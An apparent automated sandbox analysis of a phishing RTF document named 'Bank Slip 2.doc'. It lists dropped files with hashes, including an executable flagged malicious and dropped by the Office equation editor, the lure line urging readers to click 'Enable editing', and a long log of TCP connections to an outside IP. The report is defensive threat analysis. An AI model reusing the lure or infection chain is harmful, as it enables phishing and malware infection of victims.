                    Entropy (8bit):1.3568273340340578
                    Encrypted:false
                    SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbp:IiiiiiiiiifdLloZQc8++lsJe1Mze
                    MD5:FA901E7FCD2D72CCAD762E6F4E67345A
                    SHA1:87DA4FC64F137B5C84C440C3EA31D52646BFA830
                    SHA-256:26CDB44AD37C36DFA9F40D19FFE63F8D0034E0887481DECCD09449AC5CDFB1F5
                    SHA-512:0BE49987BF98770B3E98A297C20557B3F1D5CF0C618BB37A8070E79085884A2E9B48C3D99323509FB259989238C938BCE6B1591A8ACE068007DE25031B137313
                    Malicious:false
                    Reputation:low
                    Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{57BE0F5E-0BF5-4CE6-96F3-B3AC962F851D}.tmp

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1024
                    Entropy (8bit):0.05390218305374581
                    Encrypted:false
                    SSDEEP:3:ol3lYdn:4Wn
                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\21umizuh.yjs.psm1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Preview:1

                    C:\Users\user\AppData\Local\Temp\oygt2vjk.eyq.ps1

                    Download File
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Preview:1

                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Bank Slip 2.LNK

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:07 2023, mtime=Fri Aug 11 15:42:07 2023, atime=Mon Jul 1 17:06:03 2024, length=424988, window=hide
                    Category:dropped
                    Size (bytes):1019
                    Entropy (8bit):4.557659213137868
                    Encrypted:false
                    SSDEEP:12:8NBnC80gXg/XAlCPCHaXQ5B5B/BGFX+WIoNFjuicvbIuiarDtZ3YilMMEpxRljKc:8NBnvk/XTg5LbkeyNeEuiWDv3qOk7N
                    MD5:B835129373E7F5EED717412B30BB172E
                    SHA1:25DBF2E5E4DF7AC2E31F87FF9AC41ED7776378E5
                    SHA-256:D8CBEF2A456739AC1E0FB2DD3441023F0049EF92AD8FEE861ACC623AF51F465B
                    SHA-512:E58614E701B01800CF32C8EB085DFCD66B630E511291F868D571C3B8ACABD366F7A08541BFAAFC85A2DA8270DA58734691B19AA5987A98063D20485EB0A1DB07
                    Malicious:false
                    Preview:L..................F.... .....d.r.....d.r...D..U.....|...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X....user.8......QK.X.X..*...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2..|...X. .BANKSL~1.DOC..L.......WD..WD.*.........................B.a.n.k. .S.l.i.p. .2...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\413794\Users.user\Desktop\Bank Slip 2.doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.B.a.n.k. .S.l.i.p. .2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......413794..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.

                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Generic INItialization configuration [folders]
                    Category:dropped
                    Size (bytes):56
                    Entropy (8bit):4.651017645233257
                    Encrypted:false
                    SSDEEP:3:M1tFucXLUYCm4VFucXLUYCv:MwZ0Z1
                    MD5:5CCBE259BC7302620DEE438CE2CDE35B
                    SHA1:158323D4D5E544D1A4D755855E4278978FEF345F
                    SHA-256:0EA5DFD0DC5E9DA1F2139AD6B340C6703E0B02282617453CEC09A683F41CB05C
                    SHA-512:6F9FEBB5583CEA52833B8902884E33252093952044981D33C468D8FD201F21A4B82B9B66264A4C46D02995FE7F077D3CA8AC4E38CD9A4C06B378D5F014C0BFB3
                    Malicious:false
                    Preview:[doc]..Bank Slip 2.LNK=0..[folders]..Bank Slip 2.LNK=0..

                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.4797606462020307
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                    Malicious:false
                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                    C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                    Category:dropped
                    Size (bytes):2
                    Entropy (8bit):1.0
                    Encrypted:false
                    SSDEEP:3:Qn:Qn
                    MD5:F3B25701FE362EC84616A93A45CE9998
                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                    Malicious:false
                    Preview:..

                    C:\Users\user\AppData\Roaming\obie8920193.exe

                    Download File
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):554504
                    Entropy (8bit):7.930758266319395
                    Encrypted:false
                    SSDEEP:12288:+RfMJlRPMhU1n75ZyoFXm5PpVHSyE7ZhvCgC3UGGqRyUs3PKspeuD3kR:pbRj5ZrXm57ktqRyp3PKSM
                    MD5:DBDACF479A9DD40133701E06E6DC401C
                    SHA1:5E78767CF2498D34FC27674FF326F2A7CE5AB2A3
                    SHA-256:A597F53ED7D5E4CC1AF67800969953F431C7C99467D75A42E3DB360D7302283C
                    SHA-512:F46D0FCE9AD0E9C4A9142E53D02AA903DC082872068DEA6597C8D22E6154F25976A309815A8EFD721B5451CEB3646976D69E664DB261BECD18F250B8FDAA89A6
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f..............0...... .......4... ...@....@.. ....................................@..................................4..O....@...............@...6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......8..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\Desktop\~$nk Slip 2.doc

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.4797606462020307
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                    Malicious:false
                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                    Static File Info

                    General

                    File type:Rich Text Format data, version 1
                    Entropy (8bit):3.4400007721781107
                    TrID:
                    • Rich Text Format (5005/1) 55.56%
                    • Rich Text Format (4004/1) 44.44%
                    File name:Bank Slip 2.doc
                    File size:424'988 bytes
                    MD5:ff06a87dd0550386be1f780d560f1877
                    SHA1:69e95738ec635520a508f7424a759261e5032cb0
                    SHA256:511c82313461b74fe24201d13dead6a280311d248062e09a465eb950502d1c18
                    SHA512:60e39f9628edbcb5118d53a2887c8f4879260d1d480a6a25960d58366fef2ca248b7115b521ff7de57c61063c1c35da0ac318fc22ad472b38b0cf34ecfd2534c
                    SSDEEP:6144:PGuqGuqGuqGuqGuqGuqGuqGuqGuqGuqGuVhG+qMh9c:xe
                    TLSH:F094AD6DD34B02598F620377AB571E5142BDBA7EF38552B1305C533933EAC38A2252BE
                    File Content Preview:{\rtf1..{\*\RS49Nonp2wIuEGruVyV2Djh9umOqq84rr6LkQ6ZgzbrhVSD3NN5nPjvlCWJeifzQ7YTznibzmwc5GTKEPbULUKcEBSug8oNvqoN9dBIY6yWLdsZEEfcxc3BKVc5FG}..{\635001118please click Enable editing from the yellow bar above.The independent auditors. opinion says the financi

                    File Icon

                    Icon Hash:2764a3aaaeb7bdbf

                    Static RTF Info

                    Objects

                    IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                    000018E8Fhno

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jul 1, 2024 20:06:07.563211918 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:07.563245058 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:07.563322067 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:07.574750900 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:07.574781895 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.064400911 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.064493895 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.070502996 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.070525885 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.070756912 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.070813894 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.143913984 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.184499979 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.288528919 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.288634062 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.288652897 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.288671017 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.288685083 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.288707018 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.288712978 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.288753033 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.288768053 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.288805008 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.288819075 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.288857937 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.289149046 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.289184093 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.289290905 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.289364100 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.289613008 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.289652109 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.289664984 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.289699078 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.289812088 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.289846897 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.293333054 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.293381929 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.293391943 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.293427944 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.293433905 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.293466091 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.295106888 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.386990070 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.387167931 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.387172937 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.387203932 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.387300014 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.387336969 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.387336969 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.387346983 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.387367010 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.387383938 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.387619019 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.387658119 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.387664080 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.387692928 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.387698889 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.387729883 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.387748957 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.388125896 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.388171911 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.388299942 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.388334990 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.388340950 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.388370991 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.388595104 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.388642073 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.388648987 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.388685942 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.388691902 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.388720989 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.389091969 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.389134884 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.389141083 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.389177084 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.389183044 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.389213085 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.389667034 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.389714956 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.389720917 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.389760017 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.389765024 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.389797926 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.389802933 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.389833927 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.390256882 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.390312910 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.390317917 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.390355110 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.390356064 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.390368938 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.390391111 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.390410900 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.390950918 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.390994072 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.391000986 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.391036987 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.478580952 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.478679895 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.478743076 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.478775024 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.478789091 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.478790045 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.478809118 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.478816986 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.478852987 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.478872061 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.479468107 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.479520082 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.479522943 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.479532003 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.479556084 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.479571104 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.480468988 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.480525017 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.480531931 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.480544090 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.480576038 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.481560946 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.481610060 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.481615067 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.481626034 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.481668949 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.481681108 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.482309103 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.482356071 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.482366085 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.482374907 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.482386112 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.482403994 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.483285904 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.483334064 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.483339071 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.483346939 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.483376026 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.484343052 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.484384060 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.484401941 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.484409094 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.484431982 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.484443903 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.485290051 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.485332012 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.485342979 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.485353947 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.485366106 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.485384941 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.569355011 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.569415092 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.569431067 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.569456100 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.569469929 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.569503069 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.569793940 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.569839001 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.569842100 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.569855928 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.569885015 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.570609093 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.570663929 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.571470976 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.571530104 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.571530104 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.571538925 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.571574926 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.572352886 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.572400093 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.572417974 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.572426081 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.572442055 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.572460890 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.573242903 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.573296070 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.573299885 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.573309898 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.573342085 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.574117899 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.574172974 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.574174881 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.574183941 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.574218035 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.575079918 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.575134039 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.575140953 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.575151920 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.575172901 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.575195074 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.575995922 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.576047897 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.576057911 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.576072931 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.576090097 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.576111078 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.576641083 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.576695919 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.576704025 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.576714993 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.576733112 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.576739073 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.576751947 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.576761961 CEST44349163104.21.53.203192.168.2.22
                    Jul 1, 2024 20:06:08.576773882 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.576790094 CEST49163443192.168.2.22104.21.53.203
                    Jul 1, 2024 20:06:08.577616930 CEST44349163104.21.53.203192.168.2.22
